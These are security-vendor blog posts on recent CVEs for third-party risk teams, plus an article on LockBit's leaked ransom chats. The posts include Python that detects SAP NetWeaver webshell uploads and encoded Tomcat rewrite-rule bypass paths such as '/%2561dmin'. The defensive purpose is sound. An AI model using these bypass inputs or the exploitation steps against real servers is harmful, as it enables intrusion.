  • Apache Tomcat – Apr2025: CVE-2025-31650, CVE-2025-31651, DoS Vulnerability, Rewrite Rule Bypass Vulnerability in Apache Tomcat.
  • Fortinet Symlink Backdoor: CVE-2022-42475, CVE-2024-21762, CVE-2023-27997, Arbitrary Code Execution Vulnerability, Numeric Truncation Error, Heap-based Buffer Overflow Vulnerability, Out-of-bounds Write Vulnerability in FortiGate devices.
  • SonicWall SSLVPN Gen7: CVE-2025-32818, Null Pointer Dereference Vulnerability, DoS Vulnerability in SonicWall SSLVPN Gen 7 devices.
  • Redis Server: CVE-2025-21605, Allocation of Resources Without Limits or Throttling in Redis Servers.
  • Adobe ColdFusion: CVE-2025-24446, CVE-2025-24447, CVE-2025-30281, CVE-2025-30282, CVE-2025-30284, CVE-2025-30285, CVE-2025-30286, CVE-2025-30287, CVE-2025-30288, CVE-2025-30289, CVE-2025-30290, Deserialization of Untrusted Data, Improper Authentication, Improper Access Control, OS Command Injection, Improper Input Validation, Path Traversal Vulnerabilities in Adobe ColdFusion.
  • Beego: CVE-2025-30223, Reflected/Stored XSS Vulnerabilities in Beego Web Framework.
  • Ivanti Connect Secure: CVE-2025-22457, Stack-based Buffer Overflow Vulnerability in Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti ZTA Gateways.
  • FortiSwitch: CVE-2024-48887, Unverified Password Change Vulnerability in Fortinet FortiSwitch web interface.
  • MinIO: CVE-2025-31489, Improper Verification of Cryptographic Signature Vulnerability in MinIO Go module package.
  • Kubernetes Ingress NGINX: CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974, Improper Isolation or Compartmentalization Vulnerability, Remote Code Execution Vulnerability in Kubernetes ingress-nginx controller.
  • Synology DSM: CVE-2024-10441, Remote Code Execution Vulnerability in Synology BeeStation OS (BSM), Synology DiskStation Manager (DSM).
  • Synapse Server: CVE-2025-30355, Improper Input Validation Vulnerability in Matrix Synapse Server.
  • Juniper Junos OS – Mar2025: CVE-2025-21590, Improper Isolation or Compartmentalization Vulnerability in Juniper Junos OS.
  • SAP NetWeaver – Mar2025: CVE-2017-12637, Directory Traversal Vulnerability in SAP NetWeaver Application Server.

The post Focus Friday: TPRM Insights Into SysAid, ActiveMQ, Webmin, and Couchbase Server Vulnerabilities appeared first on Black Kite.

Your Friendly Neighborhood Ransomware Syndicate Will See You Now

8 May 2025 at 10:41

Written by: Dr. Ferhat Dikbiyik, Chief Research & Intelligence Officer

From corporate-sounding breach statements to templated negotiations and ESXi support, LockBit blurred the line between cybercrime and customer service — until they were hacked themselves.

If you’ve ever imagined ransomware gangs as chaotic bands of hoodie-wearing hackers launching attacks from the shadows, LockBit would like a word — preferably via encrypted chat, with structured pricing, timezone-aware support, and test decrypts to help you “experience the product” before buying.

LockBit operates with a surprising level of business sophistication, offering structured pricing, customer support, and even test decrypts. This article details their corporate-like breach announcement after being hacked themselves, their tiered negotiation tactics, and their understanding of enterprise IT environments like ESXi. Ultimately, defenders need to recognize this business-like approach to ransomware in order to better anticipate and prevent future attacks.

LockBit Is All Business

After being hacked themselves on May 7, 2025, LockBit released a statement so polished it could’ve been run through a corporate PR team:

“I’m currently investigating how the breach happened and rebuilding the system… no decryptors or any stolen company data were harmed. The full panel and blog are still operational.”

They even offered to pay for intel on the perpetrator (“xoxo” from Prague) — a move eerily reminiscent of a bug bounty program, though they may have just misread a cheeky “hugs and kisses from Prague” sign-off as a hacker’s handle.

LockBit’s leaked breach notice, posted on their own dark web site, reads like a corporate status update — reassuring users that no decryptors or stolen data were affected, and bizarrely offering a bounty for “xoxo from Prague,” which may just be a sarcastic sign-off rather than a hacker’s alias.

Yes, you read that correctly.

This isn’t just ransomware. It’s ransomware-as-a-business.
And if LockBit had an investor pitch deck, I wouldn’t be surprised if it included growth charts and an affiliate referral program.

But that’s the thing: LockBit wasn’t just a criminal enterprise. It was a business. A brand. A platform.
And just like any startup past its prime, it had structured pricing, technical documentation, customer onboarding…and a spectacular fall.

From Peak Power to a Platform Breach

Before Operation Cronos dismantled parts of its infrastructure earlier this year, LockBit was the reigning king of ransomware. They leaked data from over 200 victims per month, supported hundreds of affiliates, and ran a criminal operation with all the polish of a B2B tech firm.

After Cronos, that number dropped to single digits per month. Many affiliates walked away. And when LockBit got breached themselves, the mask slipped, revealing not just their systems, but their business logic.

The leaked negotiation chats read less like ransom demands and more like CRM transcripts.

The Defaced LockBit site displays a taunting message: “Don’t commit a crime. CRIME IS BAD. xoxo from Prague”—which the gang seemingly misread as a hacker alias in their breach response.

How to Sell a Ransom, LockBit Style

LockBit’s chats followed a consistent rhythm: name your price, offer a taste, apply pressure, close the deal. Sound familiar?

1. Negotiation, But Make It Tiered

One small business pleads:

“We feel like the price is high. Can we agree on $3,600?”

LockBit’s response?

“Ok, $3600” (reduced from $4,000)

But after an initial discount, they’re not here for haggling:

“no”
“There will be no more talk about discounts.”

A typical LockBit negotiation: scripted replies, tiered pricing, and just enough flexibility to close the deal — all wrapped in ransomware-as-a-service professionalism.

Ransom pricing was neatly aligned with perceived company size:

  • Small businesses: $1,500–$4,000
  • Mid-sized companies: $30K–$70K
  • Large enterprises: $100K–$150K+

Total across all negotiations: $767,800
Average ask: $40,410

This isn’t chaos. It’s value-based pricing.

2. Customer Service Scripts, with Encryption

“You can attach a few files for test decryption by packing them into an archive…”
“Please wait for a reply, sometimes it takes several hours due to possible time zone differences.”

These lines appear over and over — clearly copy-pasted. 

We’re not dealing with improvisation here. We’re dealing with internal playbooks and canned responses. Like Zendesk, but for extortion.

3. Trust-Building with Freemium Tactics

Need proof that the decryptor works? No problem.

“We can decrypt few random files for FREE.”
“You will need to disable your AV and just run the .exe decryptor.”

That’s not just social engineering. That’s product-led growth.

4. Fear, Shame, and a Bit of Taunting

In one case, a desperate employee begs:

“Please don’t spoil my life… My company will file a case on me… My family will be suffered.”
LockBit replies coldly: “I can’t help you, it’s to end this dialog.”

Elsewhere, they mock:

“You know your pass: P@ssw0rd”

They don’t just threaten. They undermine your confidence.

A LockBit negotiation turns transactional: the victim outlines terms like a service agreement, while the operator replies with decryption guarantees, tech support timelines, and even a jab about weak passwords.

5. Targeted Pressure, Personalized Pricing

LockBit tailors its tactics to your environment:

“We found a lot of contact information of your employees, clients, partners…”
“We will try to convey information about the leak to each of these contacts.”

And if you’re rich?

“I saw your financial report. Our price is not big for you.”
“The price…was formed based on the indicators of your company.”

This is market segmentation, but for criminal revenue.

A LockBit negotiation unfolds like a budget meeting—discount requests, financial hardship pleas, and even regional economic context—until the operator cuts it off with cold finality: “There will be no more talk about discounts.”

6. Enterprise IT Support… from Criminals

Need to decrypt an ESXi cluster? LockBit’s got you.

“Log in to vCenter, enable SSH, upload decryptor… run ./decrypt… check decrypt.llg log…”
“Do not run multiple decryptors simultaneously… or files may be corrupted.”

We’ve seen fewer steps in vendor documentation.
These actors understand virtualization, backup systems, and endpoint behavior.

This isn’t script kiddie territory. This is ransomware with release notes.

The Breach Heard Around the Dark Web

When LockBit got breached, the illusion cracked.

They scrambled to assure “customers” that nothing critical was lost, systems were being rebuilt, and operations were ongoing. The message, minus the extortion and anonymity, would be right at home in an AWS status update.

The offer to pay for intel on “xoxo from Prague” (which again, might’ve just been a sarcastic sign-off) cemented the absurdity: even ransomware groups are vulnerable to phishing and misinterpretation.

They were so committed to acting like a business… they ended up reacting like one too.

Lessons for Defenders

So what now?

LockBit may be on the decline, but the playbook they wrote will outlive them. And the next ransomware “startup” will come with better UX, faster support, and cleaner infrastructure.

To stay ahead, we need to:

  • Monitor for ransomware susceptibility, not just breaches
  • Assess vendor-level risk posture, continuously
  • Recognize criminal operations behaving like product teams

At Black Kite, we’ve developed tools like the Ransomware Susceptibility Index® (RSI™) and FocusTags™ to help our clients and their vendors stay ahead of this evolution — not just after an incident, but before they become one.

Because if ransomware syndicates are going to act like businesses, it’s time we start treating them like competitors — not just criminals.

Dr. Ferhat Dikbiyik is the Chief Research & Intelligence Officer at Black Kite, where he leads BRITE, the team behind third-party risk intelligence, ransomware trend analysis, and the tools helping organizations stay three steps ahead of their next threat.

Read our full 2025 Supply Chain Vulnerability Report: Navigating a New Era of Managing Vulnerability Risk in Third Parties – accessible instantly, no download required.

The post Your Friendly Neighborhood Ransomware Syndicate Will See You Now appeared first on Black Kite.

Focus Friday: TPRM Approach to SAP NetWeaver VCFRAMEWORK RCE and Apache Tomcat HTTP/2 DoS and Rewrite-Rule Bypass

2 May 2025 at 07:59

Written by: Ferdi Gül

Welcome to this week’s Focus Friday, where we approach the latest critical vulnerabilities through a third-party risk management lens. We begin with SAP NetWeaver Visual Composer’s unauthenticated file upload RCE (CVE-2025-31324), a zero-day actively exploited on over 1,200 servers. Then, we turn to Apache Tomcat’s April 2025 issues—CVE-2025-31650 (HTTP/2 memory-leak DoS) and CVE-2025-31651 (rewrite-rule bypass)—which pose denial-of-service and data-exposure risks. In each section, we’ll outline key details, TPRM-specific questions, and actionable remediation steps, before demonstrating how Black Kite’s FocusTags™ streamline vendor risk identification and response.

Filtered view of companies with SAP NetWeaver VCFRAMEWORK FocusTag™ on the Black Kite platform.

CVE-2025-31324 in SAP NetWeaver VCFRAMEWORK

What is the SAP NetWeaver VCFRAMEWORK RCE vulnerability?

This issue is an unauthenticated file-upload flaw in the Metadata Uploader component of SAP NetWeaver Visual Composer (VCFRAMEWORK). Attackers can send crafted POST requests to /developmentserver/metadatauploader to place JSP, WAR, or JAR payloads on the server, then invoke them via simple GET requests—achieving full remote code execution and system takeover.

It is rated Critical with a CVSS v3.1 base score of 10.0 (per the SAP Support Portal) and carries an EPSS score of 55.64%. The National Vulnerability Database first published the CVE on April 24, 2025.

Exploitation in the wild has been observed since at least March 27, 2025, primarily targeting manufacturing environments and deploying webshells such as helper.jsp and cache.jsp. Post-exploit tooling includes Brute Ratel C2 and Heaven’s Gate for stealthy persistence (per FocusTag details).

This CVE was added to CISA’s Known Exploited Vulnerabilities catalog on April 29, 2025. CISA has not issued a separate advisory beyond the KEV entry.

Shadowserver Foundation identified 427 internet-exposed SAP NetWeaver servers, with the highest counts in the US, India, and Australia.

Why should TPRM professionals care?

SAP NetWeaver is a widely deployed application server and development platform—often underpinning critical business processes. An unauthenticated RCE in a Visual Composer add-on can lead to full server compromise, unauthorized data access, lateral movement, and supply-chain ripple effects. TPRM teams must ensure that any third-party vendors using VCFRAMEWORK have assessed their exposure and applied mitigations promptly to avoid costly incident response and reputational damage.

What questions should TPRM professionals ask vendors about CVE-2025-31324?

To assess vendor risk, consider asking:

  1. Have you applied the emergency patch, SAP Security Note 3594142, to all instances of SAP NetWeaver AS Java 7.xx with the Visual Composer (VCFRAMEWORK) component installed to mitigate the risk of CVE-2025-31324?
  2. Have you conducted an audit to search for and remove unauthorized JSP/WAR/JAR files under ‘…/irj/servlet_jsp/irj/root/’ that may have been uploaded due to the vulnerability in the Metadata Uploader component of SAP NetWeaver Visual Composer?
  3. Have you implemented measures to restrict access to all Metadata Uploader URL variants via SICF, especially if Visual Composer is unused, to prevent unauthenticated file uploads and remote code execution?
  4. Are you actively monitoring your NetWeaver logs and alerting on POSTs to uploader endpoints that return HTTP 200 without an authentication challenge to detect potential exploitation of CVE-2025-31324?

Remediation Recommendations for Vendors subject to this risk

Vendors should take the following steps immediately:

  • Apply the Emergency Patch: Deploy SAP Security Note 3594142 (released April 25, 2025) without delay.
  • Restrict Endpoint Access: Disable or firewall all Metadata Uploader URL variants via SICF if Visual Composer is unused.
  • Audit & Remediate: Search for JSP/WAR/JAR files in the servlet paths and remove any unauthorized webshells.
  • Monitor & Detect: Forward NetWeaver logs to your SIEM; alert on HTTP 200 POSTs to uploader endpoints that bypass authentication.
  • Harden Configurations: Enforce HTTPS, require authentication on portal interfaces, and restrict access to trusted hosts.
  • Run Scanners: Use available CVE-2025-31324 scanning tools to identify remaining exposures and verify remediation.
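As an added example, not Black Kite’s or SAP’s code, the following Python implements the two detections recommended above over constructed access-log lines: it flags uploader POSTs answered with HTTP 200 rather than an authentication challenge, flags JSP files served from the servlet root path, and correlates the two by client address. The log layout is a constructed common-log format (not SAP’s own), and the path strings and the helper.jsp/cache.jsp names come from the text above.

```python
import re

# Constructed access-log lines in a simplified common-log layout (assumption:
# not SAP's ICM/J2EE log format). Client addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.10 - - [27/Mar/2025:10:02:11 +0000] "GET /irj/portal HTTP/1.1" 200
203.0.113.10 - - [27/Mar/2025:10:02:15 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200
203.0.113.10 - - [27/Mar/2025:10:02:20 +0000] "GET /irj/servlet_jsp/irj/root/helper.jsp HTTP/1.1" 200
198.51.100.7 - - [27/Mar/2025:10:05:02 +0000] "POST /developmentserver/MetadataUploader/ HTTP/1.1" 401
198.51.100.7 - - [27/Mar/2025:10:05:09 +0000] "GET /irj/servlet_jsp/irj/root/cache.jsp HTTP/1.1" 404
192.0.2.44 - - [27/Mar/2025:10:07:40 +0000] "GET /irj/servlet_jsp/irj/root/index.jsp HTTP/1.1" 200
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Matched case-insensitively and as a substring so the "URL variants" the text
# mentions (trailing slash, different casing) are covered.
UPLOADER_RE = re.compile(r"/developmentserver/metadatauploader", re.IGNORECASE)
SERVLET_ROOT = "/irj/servlet_jsp/irj/root/"
KNOWN_SHELL_NAMES = {"helper.jsp", "cache.jsp"}   # names reported in the text above


def _finding(client, severity, rule, line):
    return {"client": client, "severity": severity, "rule": rule, "line": line}


def analyze(log_text):
    """Return findings in log order; each is a dict with client, severity, rule, line."""
    findings = []
    accepted_upload_clients = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue   # unparseable line; a production pipeline would count these
        client, method = m["client"], m["method"].upper()
        path, status = m["path"].split("?", 1)[0], int(m["status"])
        if method == "POST" and UPLOADER_RE.search(path):
            if status == 200:
                accepted_upload_clients.add(client)
                findings.append(_finding(client, "high",
                                "uploader POST returned 200 with no authentication challenge", line))
            elif status in (401, 403):
                findings.append(_finding(client, "info",
                                "uploader POST rejected by authentication", line))
        elif (method == "GET" and status == 200
              and path.lower().startswith(SERVLET_ROOT) and path.lower().endswith(".jsp")):
            name = path.rsplit("/", 1)[-1].lower()
            if client in accepted_upload_clients:
                sev, rule = "critical", "JSP served to a client whose upload was accepted earlier"
            elif name in KNOWN_SHELL_NAMES:
                sev, rule = "high", f"JSP name {name} matches a reported webshell"
            else:
                sev, rule = "medium", "JSP served from servlet root; confirm the file is authorized"
            findings.append(_finding(client, sev, rule, line))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"[{f['severity']:8}] {f['client']:14} {f['rule']}")
```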

How TPRM professionals can leverage Black Kite for this vulnerability

Black Kite published the SAP NetWeaver VCFRAMEWORK [Suspected] FocusTag on April 29, 2025, highlighting over 1,200 exposed servers and active exploitation trends. Within the Black Kite platform, TPRM teams can:

  • Identify at-risk vendors: Automatically surface which third parties in your ecosystem host vulnerable Visual Composer instances.
  • Pinpoint vulnerable assets: Obtain IP addresses and subdomains linked to exposed VCFRAMEWORK components.
  • Track remediation progress: Monitor vendor patch status and anomalous telemetry around the /metadatauploader endpoint.
  • Drive focused outreach: Narrow questionnaires and assessments to only those vendors with confirmed exposure, reducing vendor fatigue and accelerating risk mitigation.

Black Kite’s SAP NetWeaver VCFRAMEWORK FocusTag™ details critical insights on the event for TPRM professionals.

CVE-2025-31650 & CVE-2025-31651 in Apache Tomcat

What are the CVE-2025-31650 and CVE-2025-31651 vulnerabilities?

CVE-2025-31650 is a denial-of-service issue in Tomcat’s HTTP/2 implementation: malformed priority headers lead to incomplete request cleanup, causing a memory leak and eventual server crash. It carries a CVSS v4 score of 8.7 and an EPSS of 0.03%.

CVE-2025-31651 is a rewrite-rule bypass flaw in Tomcat’s RewriteValve: certain percent-encoded paths slip past security rules, exposing JSP shells or confidential files. It has a CVSS v3.1 score of 7.5 and an EPSS of 0.02%.

Both were first published in the National Vulnerability Database on April 28, 2025. Public proof-of-concept code exists for each, but no active exploitation has been reported and neither appears in CISA’s Known Exploited Vulnerabilities catalog.

Why should TPRM professionals care?

Apache Tomcat powers countless web applications. A DoS can disrupt critical services and lead to business outages, while a rewrite-rule bypass can expose sensitive data and application logic. In a third-party risk context, vendors running affected versions—even if not compromised—pose material operational and data-exposure risks.

What questions should TPRM professionals ask vendors about these flaws?

To home in on true exposure, consider asking:

  1. Have you updated all instances of Apache Tomcat to versions 9.0.104, 10.1.40, or 11.0.6 (or later) to mitigate the risk of CVE-2025-31650 and CVE-2025-31651?
  2. Can you confirm if you have disabled HTTP/2 or the RewriteValve entirely if your application does not explicitly require them, as recommended in the advisory to mitigate the risk of CVE-2025-31650 and CVE-2025-31651?
  3. Have you implemented runtime protections such as using a reverse proxy (e.g. NGINX, Apache HTTPD) to filter out invalid HTTP/2 frames and suspicious URL-encoded paths before they reach Tomcat, as recommended in the advisory?
  4. Have you audited and strengthened your RewriteValve rules, including adding explicit RewriteCond checks to reject requests containing %3F, %25, or other high-risk encodings, as recommended in the advisory to mitigate the risk of CVE-2025-31651?

Remediation Recommendations for Vendors subject to this risk

Vendors should:

  • Upgrade to Fixed Versions: Immediately move to Apache Tomcat 9.0.104, 10.1.40, or 11.0.6 (or later).
  • Harden HTTP/2 Configuration: Disable HTTP/2 if not required; otherwise, enforce valid priority header parsing at the proxy or WAF.
  • Review RewriteValve Rules: Ensure canonicalization of percent-encoded paths and add explicit RewriteCond checks for high-risk encodings.
  • Implement Runtime Protections: Use a reverse proxy or WAF to drop malformed HTTP/2 frames and suspicious URL-encoded requests before they reach Tomcat.
  • Monitor & Alert: Instrument JVM memory metrics for early out-of-memory warnings; log and alert on anomalous priority headers or percent-encoded URIs.
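The rewrite-rule items above (canonicalize percent-encoded paths, reject %25 and %3F) can be shown side by side. The Python below is an added example, not Tomcat’s RewriteValve code: a hypothetical deny rule for /admin and /WEB-INF is first matched against the raw request path, then against a canonical form obtained by repeated percent-decoding and dot-segment collapsing, with high-risk encodings rejected outright. The protected prefixes, encoding list and probe paths are constructed for the example.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical protected locations standing in for a RewriteValve "security rule".
PROTECTED = ("/WEB-INF", "/admin")

# Encodings the remediation above singles out (%25, %3F) plus the other usual
# ways of smuggling a separator or dot-segment past a path match (assumed list).
HIGH_RISK_ENCODINGS = ("%25", "%3f", "%2f", "%5c", "%2e", "%00")


def has_high_risk_encoding(raw_path):
    """True when the raw request path contains any listed encoding (case-insensitive)."""
    lowered = raw_path.lower()
    return any(token in lowered for token in HIGH_RISK_ENCODINGS)


def canonicalize(raw_path, max_rounds=3):
    """Percent-decode until the path stops changing (so double encoding such as
    %2561 -> %61 -> a is unwound), then collapse '.' and '..' segments.
    Returns None when the path has not stabilised after max_rounds, which a
    deny-by-default rule should treat as a reject."""
    path = raw_path
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    else:
        return None
    canonical = posixpath.normpath(path)
    if not canonical.startswith("/"):
        canonical = "/" + canonical
    return canonical


def _matches_protected(path):
    return any(path == p or path.startswith(p + "/") for p in PROTECTED)


def naive_denied(raw_path):
    """'Before' form: the rule is matched against the request path as received."""
    return _matches_protected(raw_path)


def hardened_denied(raw_path):
    """Hardened form: reject high-risk encodings outright (the RewriteCond
    recommendation above) and match the rule against the canonical path."""
    if has_high_risk_encoding(raw_path):
        return True
    canonical = canonicalize(raw_path)
    return canonical is None or _matches_protected(canonical)


# Constructed request paths: the first is the honest request, the next three
# reach the same protected resource through encoding, the last is benign.
PROBES = [
    "/admin/index.jsp",
    "/%61dmin/index.jsp",
    "/static/..%2fadmin/index.jsp",
    "/%2561dmin/index.jsp",
    "/public/page.html",
]


def compare(paths=PROBES):
    """Map each path to (denied by naive rule, denied by hardened rule)."""
    return {p: (naive_denied(p), hardened_denied(p)) for p in paths}


if __name__ == "__main__":
    for path, (naive, hardened) in compare().items():
        print(f"{path:32} naive={'deny' if naive else 'allow':5} hardened={'deny' if hardened else 'allow'}")
```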

How TPRM professionals can leverage Black Kite for these Apache Tomcat vulnerabilities

Black Kite published the “Apache Tomcat – Apr2025” FocusTag on April 30, 2025, highlighting both DoS (CVE-2025-31650) and rewrite-rule bypass (CVE-2025-31651) flaws. Through the platform, TPRM teams can:

  • Identify exposed vendors running affected Tomcat versions with HTTP/2 or RewriteValve enabled.
  • Obtain asset details—including IP addresses and subdomains—hosting vulnerable instances.
  • Track patch deployment and anomalous activity around HTTP/2 and rewrite endpoints.
  • Target outreach to only vendors with confirmed exposure, reducing questionnaire overload and speeding mitigation.

Black Kite’s Redis Server FocusTag™ details critical insights on the event for TPRM professionals.

Elevating TPRM Outcomes With Black Kite’s FocusTags™

Black Kite’s FocusTags™ are essential for transforming raw vulnerability data into TPRM-ready intelligence. With tags for SAP NetWeaver VCFRAMEWORK and Apache Tomcat’s April 2025 flaws, TPRM teams can:

  • Rapid Vendor Exposure Discovery: Flag which suppliers run the vulnerable Visual Composer component or affected Tomcat versions with HTTP/2 or RewriteValve enabled.
  • Precise Asset Mapping: Retrieve IP addresses and subdomain details tied to exposed servers for targeted assessments.
  • Risk Prioritization: Focus remediation by combining vulnerability severity (critical RCE vs. high DoS/bypass) and vendor importance.
  • Efficient Vendor Engagement: Tailor questionnaires and follow-ups only to vendors with confirmed exposures, cutting down on outreach volume.
  • Ongoing Monitoring: Track patch deployment status and detect post-patch exploitation attempts around /metadatauploader endpoints or malformed HTTP/2 traffic.

By integrating these FocusTags™ into your TPRM workflow, you gain a data-driven method that accelerates vendor risk reduction and boosts overall supply-chain resilience.



Want to take a closer look at FocusTags™?


Take our platform for a test drive and request a demo today.




About Focus Friday

Every week, we delve into the realms of critical vulnerabilities and their implications from a Third-Party Risk Management (TPRM) perspective. This series is dedicated to shedding light on pressing cybersecurity threats, offering in-depth analyses, and providing actionable insights.

FocusTags™ in the Last 30 Days:

  • SAP NetWeaver VCFRAMEWORK : CVE-2025-31324, Remote Code Execution Vulnerability in SAP NetWeaver Visual Composer’s Metadata Uploader component.
  • Apache Tomcat – Apr2025 : CVE-2025-31650, CVE-2025-31651, DoS Vulnerability, Rewrite Rule Bypass Vulnerability in Apache Tomcat.
  • Fortinet Symlink Backdoor : CVE-2022-42475, CVE-2024-21762, CVE-2023-27997, Arbitrary Code Execution Vulnerability, Numeric Truncation Error, Heap-based Buffer Overflow Vulnerability, Out-of-bounds Write Vulnerability in FortiGate devices.
  • SonicWall SSLVPN Gen7 : CVE-2025-32818, Null Pointer Dereference Vulnerability, DoS Vulnerability in SonicWall SSLVPN Gen 7 devices.
  • Redis Server : CVE-2025-21605, Allocation of Resources Without Limits or Throttling in Redis Servers.
  • Adobe ColdFusion : CVE-2025-24446, CVE-2025-24447, CVE-2025-30281, CVE-2025-30282, CVE-2025-30284, CVE-2025-30285, CVE-2025-30286, CVE-2025-30287, CVE-2025-30288, CVE-2025-30289, CVE-2025-30290, Deserialization of Untrusted Data, Improper Authentication, Improper Access Control, OS Command Injection, Improper Input Validation, Path Traversal Vulnerabilities in Adobe ColdFusion.
  • Beego: CVE-2025-30223, Reflected/Stored XSS Vulnerabilities in Beego Web Framework.
  • Ivanti Connect Secure : CVE‑2025‑22457, Stack‑based Buffer Overflow Vulnerability in Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti ZTA Gateways.
  • FortiSwitch : CVE‑2024‑48887, Unverified Password Change Vulnerability in Fortinet FortiSwitch web interface.
  • MinIO : CVE‑2025‑31489, Improper Verification of Cryptographic Signature Vulnerability in MinIO Go module package.
  • Kubernetes Ingress NGINX : CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974, Improper Isolation or Compartmentalization Vulnerability, Remote Code Execution Vulnerability in Kubernetes ingress-nginx controller.
  • Synology DSM : CVE-2024-10441, Remote Code Execution Vulnerability in Synology BeeStation OS (BSM), Synology DiskStation Manager (DSM).
  • Synapse Server : CVE-2025-30355, Improper Input Validation Vulnerability in Matrix Synapse Server.
  • Juniper Junos OS – Mar2025 : CVE-2025-21590, Improper Isolation or Compartmentalization Vulnerability in Juniper Junos OS.
  • SAP NetWeaver – Mar2025 : CVE-2017-12637, Directory Traversal Vulnerability in SAP NetWeaver Application Server.
  • MongoDB – Mar2025 : CVE-2025-0755, Heap-based Buffer Overflow Vulnerability in MongoDB’s C driver library (libbson).


The post Focus Friday: TPRM Approach to SAP NetWeaver VCFRAMEWORK RCE and Apache Tomcat HTTP/2 DoS and Rewrite-Rule Bypass appeared first on Black Kite.

Focus Friday: TPRM Insights Into Fortinet Backdoors, SonicWall SSLVPN, and Redis DoS Vulnerabilities

25 April 2025 at 14:56

Written by: Ferdi Gül

Welcome to this week’s Focus Friday, where we spotlight emerging cybersecurity threats through the lens of Third-Party Risk Management (TPRM). As organizations continue to rely heavily on digital ecosystems involving hundreds or thousands of vendors, a single vulnerability in a third-party product can ripple across entire supply chains. This week, we analyze three critical issues affecting high-profile technologies used globally: the exploitation of Fortinet SSL-VPN vulnerabilities through a symlink backdoor, a DoS flaw in SonicWall’s Gen7 SSLVPN interface, and a resource exhaustion vulnerability in Redis servers. Each of these poses unique challenges for TPRM professionals seeking to evaluate vendor exposure and reduce systemic risk.

Through the use of Black Kite’s FocusTags™, organizations can more effectively identify which vendors are likely impacted, prioritize mitigation efforts, and streamline communication. Let’s break down the technical and strategic implications of each threat.

Filtered view of companies with Fortinet Symlink Backdoor FocusTag™ on the Black Kite platform.

Fortinet Symlink Backdoor: Legacy CVEs Continue to Impact Organizations

What is the Fortinet Symlink Backdoor and Which Vulnerabilities Are Involved?

A newly identified post-exploitation method has come to light, which exploits previously patched FortiGate vulnerabilities—CVE‑2022‑42475, CVE‑2023‑27997, and CVE‑2024‑21762. This technique involves the creation of symbolic links within the SSL-VPN language files directory, effectively leveraging access to gain persistent visibility into the root file system. Upon gaining access to a vulnerable FortiGate device, attackers created symbolic links in the public-facing language folder, enabling them to bypass patching efforts and maintain read access to critical system files—even after the original flaws had been remediated.

  • CVE-2022-42475: A heap-based buffer overflow vulnerability in FortiOS SSL-VPN, allowing arbitrary code execution. CVSS: 9.8, EPSS: 93.17%​
  • CVE-2023-27997: A heap-based buffer overflow in FortiOS and FortiProxy SSL-VPN, enabling remote code execution. CVSS: 9.8, EPSS: 90.28%​
  • CVE-2024-21762: An out-of-bounds write vulnerability in FortiOS, leading to arbitrary code execution. CVSS: 9.8, EPSS: 91.91%​

According to telemetry from the Shadowserver Foundation, over 16,620 FortiGate devices across the globe have been compromised through this symlink backdoor. The majority of these cases are concentrated in Asia, followed by Europe and North America.

Proof-of-concept exploit code for the related vulnerabilities is readily available online. All three CVEs involved were added to CISA’s Known Exploited Vulnerabilities (KEV) catalog in 2022, 2023, and 2024, reflecting their known exploitation in real-world attacks. Notably, Black Kite previously issued FocusTags™ for two of these vulnerabilities: CVE‑2024‑21762 was tagged with the “FortiOS SSL VPN [Suspected]” label on February 9, 2024, while CVE‑2022‑42475 was covered under the “APT‑Risk: FortiOS/Zoho” tag on September 7, 2023. Customers who responded to those alerts likely addressed the underlying vulnerabilities proactively. However, this newly emerged post-exploitation technique warrants renewed attention.

Each of these vulnerabilities is known to be actively exploited in the wild. CVE-2022-42475 has been linked to APT5, Volt Typhoon, and UNC3886, and associated with malware families such as BOLDMOVE, Coathanger, and NoName. CVE-2023-27997 has been exploited by Volt Typhoon, APT15, APT31, Fox Kitten, RansomHub, and MirrorFace, with related malware including Coathanger, LODEINFO, NOOPDOOR, and RansomHub. CVE-2024-21762 has also seen confirmed exploitation by Volt Typhoon, often using the Coathanger and Black Basta malware families. While there is no confirmed proof that CVE-2024-21762 was directly used to plant this specific symlink backdoor, its exploitation remains highly probable and cannot be ruled out.

CISA added CVE-2023-27997 to its Known Exploited Vulnerabilities (KEV) catalog on June 13, 2023, and CVE-2024-21762 on February 9, 2024. CVE-2022-42475 has also been associated with nation-state threat actors.

Why Should TPRM Professionals Be Concerned About This Backdoor?

FortiGate devices are widely used for network security, including firewall and VPN functionalities. A compromised FortiGate device within a vendor’s infrastructure can lead to unauthorized access to sensitive data, configuration files, and network traffic. This persistent access poses significant risks, including data breaches and lateral movement within networks.​

What Questions Should TPRM Professionals Ask Vendors Regarding This Issue?

To assess the risk associated with this backdoor, consider asking vendors the following questions:

  1. Have you upgraded your Fortinet devices to the patched FortiOS versions 7.6.2, 7.4.7, 7.2.11, 7.0.17, or 6.4.16 to mitigate the risk of CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762?
  2. Have you implemented the recommended actions such as hardening SSL-VPN configurations, continuous monitoring, forensic assessment & cleanup, and deploying AV/IPS signatures to detect and remove the malicious symbolic link?
  3. Can you confirm if you have disabled SSL-VPN if not in use, or restricted access to trusted IPs only, as part of your mitigation strategy against the persistent symlink exploit in Fortinet devices?
  4. Have you conducted a forensic investigation to identify and remove lingering symlinks, reset all credentials, revoke certificates, and rotate secrets that may have been exposed due to the exploitation of CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762?

Remediation Recommendations for Vendors Subject to This Risk

Vendors should take the following actions to mitigate the risk associated with the Fortinet Symlink Backdoor:

  • Update FortiOS: Upgrade to the latest FortiOS versions that address the known vulnerabilities and remove the symlink backdoor.​
  • Inspect for Indicators of Compromise: Examine FortiGate devices for unauthorized symbolic links and other signs of compromise.​
  • Review SSL-VPN Configurations: Ensure that SSL-VPN settings are secure and do not allow unauthorized access to sensitive directories.​
  • Implement Monitoring and Alerting: Set up continuous monitoring to detect unusual activities or configurations within FortiGate devices.​
